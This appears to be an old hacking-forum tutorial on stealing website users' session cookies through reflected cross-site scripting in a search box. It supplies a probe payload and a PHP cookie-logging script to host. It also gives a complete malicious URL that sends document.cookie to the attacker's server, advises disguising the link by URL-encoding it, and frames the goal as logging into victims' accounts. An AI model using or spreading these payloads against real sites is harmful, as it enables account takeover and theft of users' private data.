Necessary things

- A little knowledge of HTML

Introduction
This method (XSS attacks) is for get the cookies users, so, for get information
of users... and then, login into the account of the victim user...u will have to
give one adress to the admin or the user u want to enter in his account...
What must have the website to can be hacked by xss method?
- A search
- That the website used cookies*
Cookies Info:
http://en.wikipedia.org/wiki/Internet_cookie
An example:
Learning XSS attack method...
- Now, we already know what's a cookie! alien so, we are going to find/view the
file that has a search... for example:
search.php
- Then, HOWTO KNOW IF THE SEARCH CAN BE EXPLOITED BY XSS ATTACK AND AFTER THAT T
HE WEBSITE COULD BE HACKED?
we have to put this in the search:
Code:
<script>alert()</script>
if appears a script alert, it's vulnerable!! cyclops_ani
if does not appear any alert it IS NOT vulnerable
~~~~~~~~~~~~~~~~~~~~~~~~~~
then, if the website's vulnerable (appears the script alert), we're going to exp
loit it!;
- 1 Step
Find the textbox's name and search's button's name
[For view it, must be viewed the page's source], an example:
Code:
<input type="text" name="word">
It is an example of source of the textbox's search
So, the textbox's name would be: word
(name="word")
Code:
<input type="submit" name="search" value="Search">
It is an example of source of the button's search.
So, the button's name would be: search
(name="search")
[By that you need a little knowledge of HTML]
- 2 Step
- Now, we know that the textbox names word
and the button names search
[Keeping Cookies];
-For keep the cookies we have 2 ways/options for do it:
Keep the cookies in a database(db) or keep the cookies in a text file (more easy
).
We're going to keep the cookies in a text file cherry
Then,
We're going to create/make a PHP's file, example: cookies.php with this source:
Code:
<?
$cookie = $_GET['cookie'];
$fff = fopen("file.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>
UPLOAD IT IN YOUR HOST!
This file will create/make other file (file.txt)
When somebody enter into http://urwebsite.com/cookies.php (so, upload cookies.ph
p in your host) his cookies will be keep in file.txt
file.txt :
This file will be created of automatic way and in it will be keep the cookie of
the victim user.
EXPLOITING THE BUG.....
This method (XSS attacks) is for get the cookies users, so, for get information
of users... and then, login into the account of the victim user...
To can get the cookies of the user that you want, you must give a adress to the
'victim', the victim will enter in the adress, and this adress will be redirect
the victim to your host, to cookies.php for keep his cookies in file.txt
the adress u must give to the victim for get his cookies:
http://www.vulnerable_wepage_victim.com/search.php?word=<script>window.location=
'http://www.your_website.com/cookies.php?cookie='+document.cookie;</script>&Sear
ch=;
http://www.vulnerable_wepage_victim.com/
The victim website... that has a search, uses cookies and it's vulnerable.
search.php
The file that contains the search
?word=
The name of the textbox (word)
if the name of the textbox was "palabra"
so, it would be:
?palabra=
<script>window.location='http://www.your_website.com/cookies.php?cookie='+docume
nt.cookie;</script>
it's the source for redirect the victim to cookies.php and get their cookies clo
wn
&Search=;
It's the name of the button, if the name of the button was "buscar"
so, it would be:
&buscar=;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I repite, for get the cookies of the user, you must give him the adress... but,
this adress is 'suspect' for that i recommend encrypt it.....
i let us this adress:
http://www.ascii.cl/es/
this adress u will need it for encrypt the adress... so....... it'll encrypt of
this way:
Code:
word=<script>...
to
Code:
%70%61%6C%61%62%72%61%3D%3C%73%63%72%69%70%74%3E...
etc.